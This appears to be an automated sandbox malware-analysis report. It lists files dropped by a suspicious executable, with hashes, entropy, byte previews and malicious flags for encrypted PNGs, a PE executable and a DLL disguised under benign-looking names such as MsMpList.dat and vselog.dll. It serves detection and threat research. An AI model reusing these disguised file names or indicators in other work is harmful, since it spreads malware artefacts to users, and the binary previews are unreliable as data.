                                                                                                              SSDEEP:3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
                                                                                                              MD5:2CA9F4AB0970AA58989D66D9458F8701
                                                                                                              SHA1:FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
                                                                                                              SHA-256:5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
                                                                                                              SHA-512:AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
                                                                                                              Malicious:true
                                                                                                              Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\dsb-hr1[1].png

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              File Type:PNG image data, 2388 x 704, 8-bit/color RGBA, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):486896
                                                                                                              Entropy (8bit):7.999649437186317
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:6144:oZ24zuaSbNyXS4pHuYgWOxuYPsE5qvujWt+wnlnRwF0RRbVYZ19dIH0zSUJs/AeC:h4zeauYgLPsZLJnRS+VYZ1Hg0zShxqZ
                                                                                                              MD5:8FB4D4B3DCE57A2C6F9FF2278B5BAE86
                                                                                                              SHA1:923840620D9A2464CA4BA9F6C3AC871370832797
                                                                                                              SHA-256:2DDE9D8EE2A40F5492C68BADCEF8D478C781A9502DB603F0F714310F29C3339F
                                                                                                              SHA-512:4DD30870F03B77CFA6F3DF360AB7EDAE8A98E996394BB39F771B7860228853F40885BF926EB585986B7639EA3D400A6B6A0F92986D756F9F8751A421638443CC
                                                                                                              Malicious:true
                                                                                                              Preview:.PNG........IHDR...T.........vNk8.. .IDATx.......-.....FW{.-./7.BJ..@.s..)......K..Nc..j..!.\.:.!.E...N....&.>..Mn*p...8u...XR.L9..ue..txfA$...{4..Fv.j........n.;.."_.,.Fy..1...........pwW...h...o.5C.SY... .u.8..`.N.=8.$.....m..+t..G.D.....9..?.S.+.A4.1z.....m.@N..;.Q{E*..{.z..t.\ti/:..C4..9.9....b.......Z.v1%L..W.pi...S.......+....$.j.F.(.y..U&a.O...."$8 T{....[T2..v'H....|.^$m.P..GhS..v.m....._7...q..g..._..G....BV.[..........T..."]...Y...\..)4..G.R%..r...SU.o.Dj:.AS.x{.Z.t_....(..d..#1#`D.....'.&...(.-,T5..J.....b.4....,....o|."cE.-v7.Jt......A.@V..ma....S.\.-..wJ.....j..L.!..G.\X]T.(....2.2.....<.13..!...F .f..f.D.....7....k<.d&..JM..[.s..o.8^.[...Kq.E..gu.Q=....."1.......H.G.......V&.Q.\..]..,.v..$m{_...QZ....2 .c4$..........E0]....7B.8.E......S..4..:poz4.oWW..-..t..}. .!. .....k.^V+;....V..3Q..V.....C..Y..D/...-h.?B.N;..Zp).....W.....x........j.j.e...?u$.[.I%#.....q..N.....=SNV.Vp.p...#....u7...B...^,......_....3.4..R.#A9.K.fci3*e.%

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\dsb-hr2[1].png

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              File Type:PNG image data, 2388 x 704, 8-bit/color RGBA, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):57536
                                                                                                              Entropy (8bit):7.99718672166578
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:1536:tl/C97eWbmtpgNMVCmVlR2cPfX3Xwn7MQ68eUYriiz:fC9opgNazRDwgwiz
                                                                                                              MD5:9E285C23C9DA187B313051DD6FEB4266
                                                                                                              SHA1:71E3F791A947F0DCA9F304B94825ED591CE169BD
                                                                                                              SHA-256:E47E61463C164964EF47EE707C93DCBCA17861038D8BA7ABCCC853926BEA2FA7
                                                                                                              SHA-512:DBABCADF0E06196EF3CC473E2D31D6298F5F76C83C3B68E6139B77E0FDF64F547F573861C594FC7FD8D24CAF69DD39ED50AC1D5860F7520A5B0B4EF7EAC3FB4C
                                                                                                              Malicious:true
                                                                                                              Preview:.PNG........IHDR...T.........vNk8.. .IDATx.......-.....FW{.-./7...N..A....m...}...N..j..!.r..}j..[...M.a../.....2.GI\(;[K.9b..'...1.G.P...'=d.;3.Q.Qx88pz.&.:...;.D...Y.M`......&.*.....z....YR..<4.'.2J.U..z.q.....!.....2.j.......;..M0..8d.9i...&N...?*.2..Lr.h..h.B........>.0.Xt.uL..0....nVrJ.4.3.H................k..x....-..J\..".tw...o:F.h...p.Z...C..+e...........o@/g.kZ......oq.....U..*..{.A.`*....).....V.r._.QcZ....oq}DlSfcO......9f........`.7....k.XyU..........`......A...&....I......&..1..~_...,qj...<...I19.r........<`P.{.........'.......X.].r..pQp../.C....V.~X..4...8.b...s@\..,...|./f...D\.{......z......<..z..a....~.........._.}..~..-...K.n%~..y..|.X..^.!;. ..(.....i..s....q..F?.h.f.&n.IGQ.>h.[u.yA....e.p.R.yi}.@0.z...f.m...l!-7k..."b.m.U.+.X,...a<.1...$.....3{7X..roJ0X.J..&}.>......np..(..W.]/.vY..QS..&j..j.r.l......<.**...V....un..c5..5k..P\Ug.s...Y....cJ.L.\Sg=S...$..Q.I#...G..g.I...}.g+_T...T..B..a....0.7....>.F.,..{...r.L.

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\dsb-hr3[1].png

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              File Type:PNG image data, 2388 x 704, 8-bit/color RGBA, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):357504
                                                                                                              Entropy (8bit):7.999473897820039
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:6144:PWBjlu8Tzg5uKKa+87hJG8Z2P6XhnRlKEOMUvykizQz+D:OplusDv4LG8BXRfsRid
                                                                                                              MD5:2977911419E268860C5E85E967E5C13E
                                                                                                              SHA1:4D9EE17F22C8B4207271E872C3B25910D9773A15
                                                                                                              SHA-256:405EEAB6A864C0DE19E5B929E7CBB235F7D734ACDD4330B4AE65B88AC238DAE9
                                                                                                              SHA-512:5BE7FC74FD795C63F8C3323E46961C1B0F2D9F4084CE417BE6D68153D93CA5CE90459EE8C83B3CEAEB4DE757A657DEAAC5979D0BBE01681368263B2CAA61F328
                                                                                                              Malicious:true
                                                                                                              Preview:.PNG........IHDR...T.........vNk8.. .IDATx.......-.....FW{.-./7!.....Z.w..$.....D..Nlv.i..j..4.:.!..H@.>3...D.w..0.L...W..F..y...hr>.W.q.j.yX....N...Ny.l.s...~..&3.P...f.4?.&.#P...<..y"..x...f.b.JS.....I?...s.}TE2.A.q..O*kI..P.M.h...A=..V9.....A.R3J\BVA.'..4.x.).M.o.g...px.Mw.#.2.../EF.....b..)cj.X..s......8.m.....*..T*.2.O.h.JO<...>.q.qi..$u...=w.dr.g.F.@..P....Fs.u...v..'.D.C..H.;]...-.8..wC....).-..%.?$.da...&.....+(...1..q.2..;..0...u...0....]...k..S....=B.e*..3.xt....8......Z...uO($k..P.d.F?;v...?0=..*.".......@...o.mo.....<B.K.4....N.....2./&.......}.. ..h...../X7....;VP.G.Q.....6.%v...m.....M.cQ...x.H-.L.?z....W.|!....Ex.....r...7...;..5?....'.....G....-[.u...f...w(.E=....5L.y.Q.>.})....~l.^.7...F(F.0..<}...4..s....L.=..8.G.Q...._g...~.......oy..d.V.....M....>%.N[.U..x..f`U|.kD.dM.!..%.y.gO....9.......<+\.wI...pfz.l.)9...R..R...........Df.._..l...g/Z....54.n.3.d.41V.ue......S..d..K.P_...c..x..FY.vP.z...M.....,.....:..@l...I..

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\extra-task2[1].png

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              File Type:PNG image data, 2388 x 704, 8-bit/color RGBA, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1589824
                                                                                                              Entropy (8bit):7.999900949539504
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:49152:ejDii8G+quo3pXoJXUK1q3EUNDi8oNH43m:e3PrVOf1q3tRq43m
                                                                                                              MD5:BA024D16008C2932005DB859C94476A8
                                                                                                              SHA1:9C832735CD7439BB82449EBCB41E240EFD51EA1E
                                                                                                              SHA-256:753920EE4FC22EBA98ACA6A6BF0C75BAC2E5145DE4316EBA4B78ABDA74A2C2D2
                                                                                                              SHA-512:9944E398921C71BC6FEC4BB957EABC1D0EAE40BDDB4BB6CE21D08EF60755F143D7B53248D3EB7C8D9B85214A152A42420ED153F4163A937DDB4EEF37A46D3B1B
                                                                                                              Malicious:true
                                                                                                              Preview:.PNG........IHDR...T.........vNk8.. .IDATx.......-.....FW{.-./7.BJ..@.s..)......K..Nc..j..!.\.:.!.E...N....&.>..Mn*p...t...XR.L9..ue..txfA$...{4..Fv.j........n.;.."_.,.Fy..1...........Jj...!|..J.F..R9.L.Qy..KK.Z...xy..m.*d.)&%....q...G..YR.#g.......B.....r..k...2K.....%d16&..4Qg\...S4..9.9....b.......ZEF/%x..W.=.=...S....V..*....$vl.F......Eyr.O....R78 T;....[T0..v'H....Z..$m.P[.GhC..5.k.5..._'...q..g..._..G....l"h#........X.T...."=v..Y...\..)d....RE-r..b..S.wo.D*;.AS.x{.Z.t_....(..d..c1# j.{r.'.*...(y,,T5..J.....b.4....,....SAM.ycE.-.m.zt......A.PV..ma....S.\.....dV.B%.j...P...I..^]T.$..?..2.2.....|.1.B...F..#....J..>..7.....<.d...JM..{.sk...Tq.[...Kq.c..eu.Q}..."1.....U.H..G.......V&.Q.\..]..,.v..$m{_...QZ....2 .c4$..........E0]....7B.8.E......S..4..:poz4.oWW..-..t..}. .!. .....k.^V+;....V..3Q..V.....C..Y..D/...-h.?B.N;..Zp).....W.....x........j.j.e...?u$.[.I%#.....q..N.....=SNV.Vp.p...#....u7...B...^,......_....3.4..R.#A9.K.fci3*e.%

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\page-404[1].png

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\efk2JUeS\lBoqoqIC.exe
                                                                                                              File Type:PNG image data, 2388 x 704, 8-bit/color RGBA, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):670784
                                                                                                              Entropy (8bit):7.999745526679517
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:12288:CvUww1DGO1GY2/SikOrH4HzLoBCC15wNnYcMUBwtYH4P:CHwtJET/j4/b6WnYcMUBT0
                                                                                                              MD5:06C2604A6B2E157543D6812D4F88D743
                                                                                                              SHA1:893512BF98154554EF2153D9DBA9700B6C99862B
                                                                                                              SHA-256:2C932C2DA7BB8F0435607F5FD362416A445A8765D06F57363D07FA5F3E0B0F6D
                                                                                                              SHA-512:03D2D76E4D3EA3FFFF4D304B0971B61FCDE2347C007BBAC3782304B9924893AAE6D3B909564B6ACC531E762015118B73DD7DA9027D39CB4D0D797ABE247F847E
                                                                                                              Malicious:true
                                                                                                              Preview:.PNG........IHDR...T.........vNk8.. .IDATx.......-.....FW{.-./7.BJ..@.s..)......K..Nc..j..!.\.:.!.E...N....&.>..Mn*p....u...XR.L9..ue..txfA$...{4..Fv.j........n.;.."_.,.Fy..1...............ys.hmbIoH....P.....=........u.:*..D......N.......................8.oAY....N.}y^...).b82..S.i....x......5.....U.. s.>..ZRM%I7..=.=...S....V..*....$vl...(.........O....R78.T.....FTp..v'Hw...>.^.Z.P[..iC..5.e....._'...q..g..._........BV.[..a.....X.T...."=v..Y...\..)t....R%..r...SU.o.Dj:..bVx..Z.to^.0.(.......#`D.....'.z.....-,T5..J.....b.4....,.....\."KE.-.G.zL......A.PV..ma....S.\.-..wJ...%.j...P...G....mT.$....2.2.....<.13..!...F.......D}.V..7....Q6.d...Jy..[.s..o.8..[...K1.E.....2=.......s.......B.G.......V&.Q....]..,.v..$m{_...QZ....2 .c4$..........E0]....7B.8.E......S..4..:poz4.oWW..-..t..}. .!. .....k.^V+;....V..3Q..V.....C..Y..D/...-h.?B.N;..Zp).....W.....x........j.j.e...?u$.[.I%#.....q..N.....=SNV.Vp.p...#....u7...B...^,......_....3.4..R.#A9.K.fci3*e.%

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\s[1].dat

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):28272
                                                                                                              Entropy (8bit):7.7116374870274536
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:9RegCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQa:O5F1FUdy422IK+gAZt2i0YPpQn4GMB
                                                                                                              MD5:6D793DEEE57502B69E89D0D15BEB4BD8
                                                                                                              SHA1:A0917DB78C9D20F89BBC19A889B5DD2E935AE19A
                                                                                                              SHA-256:5F4BEE97CECF66E48CC641C70A69A612B1CADFC1AEAFA9D382E384C7F2392BD0
                                                                                                              SHA-512:1DF06F9591CF8079156DB2E27BA803AD5909E36515116319C2275B1183609DC5BC03B52DB61B6666560128EF6D4CD28FFF0A87640815B0CC65954D977A60A899
                                                                                                              Malicious:false
                                                                                                              Preview:..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb..bbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

                                                                                                              C:\Users\user\AppData\Local\Temp\Xshell 6 Update Log.txt

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\efk2JUeS\lBoqoqIC.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):339
                                                                                                              Entropy (8bit):5.275098541964511
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:qUKjyrW4mytt8G3s8Ad4yrW4+6AbKiCmxyrW4riSyrW4pWmcNVc3ayrW4keSp7xe:vayrW4ptF744yrW4+6BifxyrW4riSyrJ
                                                                                                              MD5:5C432F8D57873B6BE523443150D57215
                                                                                                              SHA1:A14369080CC64B7C04EF736AAE89620713CEFAD3
                                                                                                              SHA-256:29ED749E1A66FE95A21FBB5D2E81EFAB2CF30503159CA57E81FD6E73A894D062
                                                                                                              SHA-512:BDEB4DEEDA7856592D3F1A3EFB3B53F46A1AE8E79E03461BE7DFAC9B010C758517F18D18E2016F4E7DF241C75F077C2AE51981CF77F761EFC96075E1FB2903B7
                                                                                                              Malicious:false
                                                                                                              Preview:[01/10/2025 22:43:59] Success.Update started: C:\ProgramData\efk2JUeS\lBoqoqIC.exe..[01/10/2025 22:43:59] Notice.Update engine version: 3.8.0.0..[01/10/2025 22:43:59] Notice.Product: Xshell 6..[01/10/2025 22:43:59] Success.Language set: Primary = 9, Secondary = 2..[01/10/2025 22:43:59] Success.Include script: _TU20_Global_Functions.lua..

                                                                                                              C:\Users\user\AppData\Local\Temp\_ir_tu2_temp_0\J.JPG

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\efk2JUeS\lBoqoqIC.exe
                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 111x63, components 3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):6887
                                                                                                              Entropy (8bit):7.912671939062537
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:EoK9OIJV7hREPQEOPdivlu54UovmNqg0aB0kOI:EXIIJVcPQEOEvMJoON/0aBwI
                                                                                                              MD5:A5E03F11616B2D7CD17079D60D461E58
                                                                                                              SHA1:C01BE1621610D881F5F25F6E255FA71E1A19404E
                                                                                                              SHA-256:B24E47D7EA726047EA52F2F7B819E64B1051D0FD852E2C616B978CE1C4F0D78F
                                                                                                              SHA-512:52D4958E188F29F7D189FE38F8A75A537101813D397AABAB907AAF436F0A52DDD5FBB49C33D32AAD7419063CC27DC2BF66C7EBBB6957575E857E35F03FE2D6AE
                                                                                                              Malicious:false
                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................?.o........................................................................................u........!.."..1.A2#..QB.a$3.Rq..b.%C...&4r....5'.S6..DTsEF7Gc(UVW......d.t..e.....)8f.u*9:HIJXYZghijvwxyz.......................................................................m.....!..1..".AQ.2a.q.B.#..R.b.3..$..Cr...4%.S.cD.&5.T6Ed'.s..Ft....UeuV7........)...............(GWf8v........gw........HXhx........9IYiy........*:JZjz....................?...-`....f..#........Y.<....7.2.b......OE....]D/..?N9..mo...<.a...C..}.X....~.."pUd....#.6'......%yKl../J.z....c.4.36.....W..D.~a.VicU..... .aa.......8m{\f0.T}.B..."..$...WKe.eh&..j................RMc....|...?.D0.}...K|.........H2..j.k.$.........9....;%.hE.G.@.Qo...x.......~..&)*i.....[.9..-k..m...].j.$>...W..u.M.kS#.q.......H.=.G.=D..T.i.<...

                                                                                                              C:\Users\user\AppData\Local\Temp\_ir_tu2_temp_0\_TUProjDT.dat

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\efk2JUeS\lBoqoqIC.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8
                                                                                                              Entropy (8bit):1.2987949406953985
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:FQFSh:EE
                                                                                                              MD5:23EDFB2405AC2E4DB37311CE948238C6
                                                                                                              SHA1:F36D23E915DD9041E47D68D8B85B4477BCC9D732
                                                                                                              SHA-256:E7964E1E6157734CDAF7960EB2B8DD16AF6FBC93A1398DA089B2C1A143A5CA23
                                                                                                              SHA-512:C3549C73663C5079EEE776BEDFB31CEF1428392C30738FB0DD6657F39F902DCF8DAFBD23AD702A1EBFF697F719990C82D8B57A553086EB77C274305AA8725D2C
                                                                                                              Malicious:false
                                                                                                              Preview:555557ww

                                                                                                              C:\Users\user\AppData\Local\Temp\_ir_tu2_temp_0\log.JPG

                                                                                                              Download File
                                                                                                              Process:C:\ProgramData\efk2JUeS\lBoqoqIC.exe
                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 111x63, components 3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):6887
                                                                                                              Entropy (8bit):7.9129099572321495
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:E1K9OIJV7hREPQEOPdivlu54UovmNqg0aB0kOI:EAIIJVcPQEOEvMJoON/0aBwI
                                                                                                              MD5:696DA2D86D01C352113E5CB64D817A1D
                                                                                                              SHA1:42D3C7C4894CF0E996930BAB162FE3A95C6A6A12
                                                                                                              SHA-256:1C649B1AC3AF7098FBE25D54B5381FB2B55A936108153175983601115F2A43EA
                                                                                                              SHA-512:676E493C27B67197896360A4AEE975BEDA0A713DF82D2B7B8CE1FCA430AA595476DDB129567EB0C87B096A734C82697C8231F26C2ED23867A843B25543FF5A08
                                                                                                              Malicious:false
                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d.............................................................................................................3...............................@...?.o........................................................................................u........!.."..1.A2#..QB.a$3.Rq..b.%C...&4r....5'.S6..DTsEF7Gc(UVW......d.t..e.....)8f.u*9:HIJXYZghijvwxyz.......................................................................m.....!..1..".AQ.2a.q.B.#..R.b.3..$..Cr...4%.S.cD.&5.T6Ed'.s..Ft....UeuV7........)...............(GWf8v........gw........HXhx........9IYiy........*:JZjz....................?...-`....f..#........Y.<....7.2.b......OE....]D/..?N9..mo...<.a...C..}.X....~.."pUd....#.6'......%yKl../J.z....c.4.36.....W..D.~a.VicU..... .aa.......8m{\f0.T}.B..."..$...WKe.eh&..j................RMc....|...?.D0.}...K|.........H2..j.k.$.........9....;%.hE.G.@.Qo...x.......~..&)*i.....[.9..-k..m...].j.$>...W..u.M.kS#.q.......H.=.G.=D..T.i.<...

                                                                                                              C:\Users\user\Documents\MsMpList.dat

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):3889557
                                                                                                              Entropy (8bit):7.999938755105323
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:98304:bAnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:0ndLOZS/DtpPJRO8OHBL4f2UQI+A
                                                                                                              MD5:30D4B6263BAEB074C32D084176528538
                                                                                                              SHA1:52A8FEEF70196276FC8689BE21B24C9FC1AAFD3A
                                                                                                              SHA-256:14E0245991F532A7D3180F5AF1759DA83ABE00AFB009780012F6A714C696CE49
                                                                                                              SHA-512:09BD776F612BBF34CE85FF0098E651485B9F69A988176475C666133DDC28DC6AF875A67C5DDBB8D61A90AD1A97274C99BC4167028CE097BCB603770AEC120AA7
                                                                                                              Malicious:true
                                                                                                              Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q".K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                                                                                              C:\Users\user\Documents\WordpadFilter.db

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              File Type:GIF image data, version 89a, 10 x 10
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8228
                                                                                                              Entropy (8bit):7.9789770028772695
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:4Bue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:4BuNhyTlBU2dp+1XrBuCgp9vU0l
                                                                                                              MD5:43FD3C42AFDF1FF2B9CADFFBF948E5F6
                                                                                                              SHA1:FBD3B3C28A4AABAE3E3003ACA90D5494B53F49A0
                                                                                                              SHA-256:7C6FBC6236EFAA28D4947DE161F77B628FECE2FD00E32F0635175993E1BC85A5
                                                                                                              SHA-512:0C947E731C4594F2357112846650A4399B667731A1CBACC77855D8C9C09A7A43B82515C31945ECA43157E4B02FFB7A0595C7406F3A614DFC17328580B603F0DA
                                                                                                              Malicious:false
                                                                                                              Preview:GIF89a.......,.?.........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6I*X.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%..*.c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI

                                                                                                              C:\Users\user\Documents\l0tiFM.exe

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):133136
                                                                                                              Entropy (8bit):6.350273548571922
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
                                                                                                              MD5:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                                                                              SHA1:6281A108C7077B198241159C632749EEC5E0ECA8
                                                                                                              SHA-256:D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
                                                                                                              SHA-512:625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w*..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#......*..........P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...*).......*.................. ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\Documents\vselog.dll

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):122880
                                                                                                              Entropy (8bit):6.002018823861582
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52Fu:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gu
                                                                                                              MD5:96A06BC270468375262C53A19B7867F2
                                                                                                              SHA1:7772F3917B6DDB49F030AA8DDB0BB8B41B59884E
                                                                                                              SHA-256:5EFFCA21EA51FED35D248F38BBA33013A467366821CB1D967FDA2D01ECFB84FF
                                                                                                              SHA-512:D0A3F838659DE0E232E7A7A45058F0CE832EE15AC3ABD26524809429415F95D70F1D4C9A037095DAF5EF968CF55F3AC4D5DBF7E17EEA5EF9BB5EF82F2D91E6F4
                                                                                                              Malicious:true
